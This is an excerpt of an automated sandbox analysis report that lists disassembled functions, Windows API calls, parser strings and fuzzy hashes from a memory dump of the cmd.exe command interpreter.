                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                        • API String ID: 2081463915-3124875276
                                                                                        • Opcode ID: 05b45b82da5f89204775736897681a5c279ab44287cf61ecc439f1f7bdefd4ab
                                                                                        • Instruction ID: 05ee6babdb2661eca39c2ec1416de2472edfeba18d7eb65f26274160494a3654
                                                                                        • Opcode Fuzzy Hash: 05b45b82da5f89204775736897681a5c279ab44287cf61ecc439f1f7bdefd4ab
                                                                                        • Instruction Fuzzy Hash: 98412A31204702DBD7246B64E87977AB7A8EB93724B68052FE042D72D0EBF6C844C732
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6E310 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E318
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E322
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E32F
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E339
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E35E
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E368
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E390
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E39A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E3C7
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E3D1
                                                                                        • _get_osfhandle.MSVCRT ref: 00D7DC35
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D7DC3F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                        • String ID: CMD.EXE
                                                                                        • API String ID: 1606018815-3025314500
                                                                                        • Opcode ID: c8a111ebb1f63f8ea9f1a3f1ad8ebc94e99b92be348ff9807e1c53e07f547a24
                                                                                        • Instruction ID: 67896a228f0c8878388054d1f1367b54d4a2c849ac5f17b96bd6538bda953585
                                                                                        • Opcode Fuzzy Hash: c8a111ebb1f63f8ea9f1a3f1ad8ebc94e99b92be348ff9807e1c53e07f547a24
                                                                                        • Instruction Fuzzy Hash: 55215EB0A00300AFD7145B78EC1EB663728AB05756B098629F506D73E5D7B5D818CB77
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D756C4 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 297COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • longjmp.MSVCRT(00DA0A70,000000FF,00000000,?,00000001,?,?,?,00D75833,?, /D /c",?,?,?,00000000,?), ref: 00D81271
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: longjmp
                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                        • API String ID: 1832741078-366822981
                                                                                        • Opcode ID: cb2474cb4c8f4fed68dc920ae07f6b083c56284836b8b63d7249ce1bb3750b5c
                                                                                        • Instruction ID: e1211f1ba82a4d4f0f5faabe24a2e6d69a88efa866459573ee91e6f18d6fe8e7
                                                                                        • Opcode Fuzzy Hash: cb2474cb4c8f4fed68dc920ae07f6b083c56284836b8b63d7249ce1bb3750b5c
                                                                                        • Instruction Fuzzy Hash: 74A10478600604EBCF28AF54D48597D7B2AFB44390B24C016F44687794D7B0DD9ACBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D67E93 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 146windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00DA0AF0,00002000,00000000,00000000,00000000,00000000), ref: 00D67ED4
                                                                                          • Part of subcall function 00D6A62F: wcschr.MSVCRT ref: 00D6A635
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00DA0AF0,00002000,?), ref: 00D67F16
                                                                                        • _ultoa.MSVCRT ref: 00D7AFC9
                                                                                        • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00D7AFDE
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00D7AFF3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                        • String ID: Application$System
                                                                                        • API String ID: 3538039442-3455788185
                                                                                        • Opcode ID: f8a1ffb6d96cfa8f12b3c1c8a7c6b8927a0afd57a5553d63acf7cf8d5747b7dd
                                                                                        • Instruction ID: 57d29259fe60804c36f2703c6aef24285478c69c16a2f1a0cab1af5a998abd52
                                                                                        • Opcode Fuzzy Hash: f8a1ffb6d96cfa8f12b3c1c8a7c6b8927a0afd57a5553d63acf7cf8d5747b7dd
                                                                                        • Instruction Fuzzy Hash: B241B271740319BBDB109BA8CC49FAEBBA9EF4A751F204129F506EB281E7709D04C771
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6E950 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 276COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                        • String ID: :.\$=,;$=,;+/[] "
                                                                                        • API String ID: 1913572127-843887632
                                                                                        • Opcode ID: cb895784f2f43058888e2687e19e339a56147e5b34e48284f1cb1548ed2d233f
                                                                                        • Instruction ID: c25322c8399d2c5dffd2fc446ad4cbf59edd858fcb4c986dea68eea118b7f2e6
                                                                                        • Opcode Fuzzy Hash: cb895784f2f43058888e2687e19e339a56147e5b34e48284f1cb1548ed2d233f
                                                                                        • Instruction Fuzzy Hash: BBA1C238A043149BDF34CBADD884BBA77B1BF44314F180299E84AA7291E770DD85CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D853AA Relevance: 18.2, APIs: 12, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D69E8E: iswspace.MSVCRT ref: 00D69E9E
                                                                                        • wcsrchr.MSVCRT ref: 00D85406
                                                                                        • wcschr.MSVCRT ref: 00D8541C
                                                                                        • wcsrchr.MSVCRT ref: 00D8544C
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00D8546B
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D8547B
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D85497
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D8549F
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D854B3
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D854D4
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00D85501
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D85557
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D85578
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                                        • String ID:
                                                                                        • API String ID: 4166807220-0
                                                                                        • Opcode ID: 0d4bab8b5bdf5421ee9f719e72abf5bd2b6b69c63402adecc64da8a3b839b17b
                                                                                        • Instruction ID: e22604028622260662076b308127994c99b75d2ec15e9b8d127b53e76773ae0f
                                                                                        • Opcode Fuzzy Hash: 0d4bab8b5bdf5421ee9f719e72abf5bd2b6b69c63402adecc64da8a3b839b17b
                                                                                        • Instruction Fuzzy Hash: AA51CF306002189BDB25BB38EC09BA977E9FF01310F1485E9E486D22D4EF708E85CBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D67610 Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00D67669
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D67670
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00D67686
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6768D
                                                                                        • _wcsicmp.MSVCRT ref: 00D67719
                                                                                        • _wcsicmp.MSVCRT ref: 00D6772B
                                                                                        • _wcsicmp.MSVCRT ref: 00D67758
                                                                                        • _wcsicmp.MSVCRT ref: 00D7AA79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap_wcsicmp$AllocProcess
                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                        • API String ID: 435930816-3086019870
                                                                                        • Opcode ID: d438abfd8b60b4c627db070f54c1325fb4d7edf3e9c0966030114c511ff610e1
                                                                                        • Instruction ID: 33e558392213c20165eb13ed574016e5802dd836b1f5702c50a5fa928c0fac26
                                                                                        • Opcode Fuzzy Hash: d438abfd8b60b4c627db070f54c1325fb4d7edf3e9c0966030114c511ff610e1
                                                                                        • Instruction Fuzzy Hash: C851E4716093029FD718DF78EC05A2A3BE5EF49318B28456EE846C7391FB61D802CB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8AEBD Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8AF04
                                                                                        • memset.MSVCRT ref: 00D8AF2E
                                                                                        • memset.MSVCRT ref: 00D8AF58
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,00D6250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 00D8B08B
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00D8B095
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00D8B0AA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8B1DA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8B1F2
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8B20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ErrorLast$InformationVolume
                                                                                        • String ID: %04X-%04X
                                                                                        • API String ID: 2748242238-1126166780
                                                                                        • Opcode ID: 1a5ef7ed7edc1d8d1539525202df458aabacca30e0913bf7df007d8c45cfe366
                                                                                        • Instruction ID: 54e680ec13ca7309abd5d50002013bfddc4d809aec59b9fe093ce94a57ef8227
                                                                                        • Opcode Fuzzy Hash: 1a5ef7ed7edc1d8d1539525202df458aabacca30e0913bf7df007d8c45cfe366
                                                                                        • Instruction Fuzzy Hash: 9491B2B1A002289BDB24EB64CC95BEAB7B8EF14354F4445EAF509D7240EB349E84CF70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6BC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace
                                                                                        • String ID: =,;
                                                                                        • API String ID: 3458554142-1539845467
                                                                                        • Opcode ID: ba21ca831418b5939e504dd30bf5b7b80ced23decb2a26f20d6aa2960ac97bea
                                                                                        • Instruction ID: cca50fe1bb23b8a9ee15a1450f6d8ff0d74ed10d3afe599ef3b682d41a3a167b
                                                                                        • Opcode Fuzzy Hash: ba21ca831418b5939e504dd30bf5b7b80ced23decb2a26f20d6aa2960ac97bea
                                                                                        • Instruction Fuzzy Hash: 56818DB59002158BDB309F68CC557BA73A5EF10325F18486BE98AEA241EB758DC4CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D723F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D72431
                                                                                        • memset.MSVCRT ref: 00D72452
                                                                                        • memset.MSVCRT ref: 00D7247C
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00D6250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00D72585
                                                                                        • _wcsicmp.MSVCRT ref: 00D725A3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D725CA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D725E3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7F32B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$InformationVolume_wcsicmp
                                                                                        • String ID: FAT
                                                                                        • API String ID: 4247940253-238207945
                                                                                        • Opcode ID: ecd913e746d7c4f162e4daedc9c4bf607a44c4fd18f0e1380cb8b48ee052c74b
                                                                                        • Instruction ID: 60285a851e9dea5d640d9558228b53ace9d14bd80738073d5bbbc7965db0f43a
                                                                                        • Opcode Fuzzy Hash: ecd913e746d7c4f162e4daedc9c4bf607a44c4fd18f0e1380cb8b48ee052c74b
                                                                                        • Instruction Fuzzy Hash: 3F5141B19102599BDF24CBA4DC99BEAB7B8EB44305F1840A9E509E3181FB74DE84CF35
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D67334 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D67381
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 00D673D6
                                                                                        • wcsncmp.MSVCRT(?,\\.\,00000004,?,00000000,?), ref: 00D673F9
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D67465
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 00D7A8C6
                                                                                          • Part of subcall function 00D70060: wcschr.MSVCRT ref: 00D7006C
                                                                                        • wcsstr.MSVCRT ref: 00D7A87E
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00D7A89B
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D7A8DE
                                                                                          • Part of subcall function 00D7589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?), ref: 00D758BB
                                                                                          • Part of subcall function 00D7589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D758CD
                                                                                          • Part of subcall function 00D68B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00D899FD,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D68B7B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                        • String ID: \\.\
                                                                                        • API String ID: 799470305-2900601889
                                                                                        • Opcode ID: 4efa418b2fb83b4c00fa935decdebbb87bdaf3278f048c9a1f559050bc34a1d4
                                                                                        • Instruction ID: d836fd0735fe10f2da304666ec3ad082f147c5b0fd3d95e1ce3873689f2009ba
                                                                                        • Opcode Fuzzy Hash: 4efa418b2fb83b4c00fa935decdebbb87bdaf3278f048c9a1f559050bc34a1d4
                                                                                        • Instruction Fuzzy Hash: EB51F6716083119BD7309B78988866FBBE8EF85754F14492AF899C3291EB70E805C7B3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6CB09 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace$_wcsicmp
                                                                                        • String ID: &<|>$+: $=,;
                                                                                        • API String ID: 3089800946-2256444845
                                                                                        • Opcode ID: 54266c8987511336297a5d96097a2a5c03b1c3c70eea3641bf688aa7c11e5fcb
                                                                                        • Instruction ID: 784cb5fb53d60ac4b29ef663dc6985820ecb841bd47905d70e373d90979aba13
                                                                                        • Opcode Fuzzy Hash: 54266c8987511336297a5d96097a2a5c03b1c3c70eea3641bf688aa7c11e5fcb
                                                                                        • Instruction Fuzzy Hash: A1312531A003244BCB204BA9AC497AA77A6EF56305F188166EC4DD3212F7319964CBB6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8BAF8 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 336COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D8C0F8: free.MSVCRT(?,?,00000000,?,00D8424F), ref: 00D8C116
                                                                                          • Part of subcall function 00D8C0F8: free.MSVCRT(?,?,00000000,?,00D8424F), ref: 00D8C123
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00000000,?,00000000), ref: 00D8BB97
                                                                                        • qsort.MSVCRT ref: 00D8BC1A
                                                                                        • wcschr.MSVCRT ref: 00D8BC6F
                                                                                        • calloc.MSVCRT ref: 00D8BCB1
                                                                                        • calloc.MSVCRT ref: 00D8BD82
                                                                                        • wcschr.MSVCRT ref: 00D8BDCB
                                                                                        • memcpy.MSVCRT ref: 00D8BE1D
                                                                                        • memcpy.MSVCRT ref: 00D8BE3E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                        • API String ID: 975110957-381716982
                                                                                        • Opcode ID: c4ad83367f8f447d1848fbbc9330e58ee8878dc2fa4ee01242392d6a09afcbb5
                                                                                        • Instruction ID: 7815205035ccd7f3298ffe0294bf4659af145221f45274625effedf59d5ddbe3
                                                                                        • Opcode Fuzzy Hash: c4ad83367f8f447d1848fbbc9330e58ee8878dc2fa4ee01242392d6a09afcbb5
                                                                                        • Instruction Fuzzy Hash: 06C1B376A002159FDB24AF68D841BAEBBB1FF48720F19406AE849E7341EB309D45CB74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6B760 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 286COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _tell.MSVCRT ref: 00D6B7F9
                                                                                        • _close.MSVCRT ref: 00D6B82C
                                                                                        • memset.MSVCRT ref: 00D6B8CC
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00D6B936
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D6B947
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6B96D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleInfoOutput_close_tellmemset
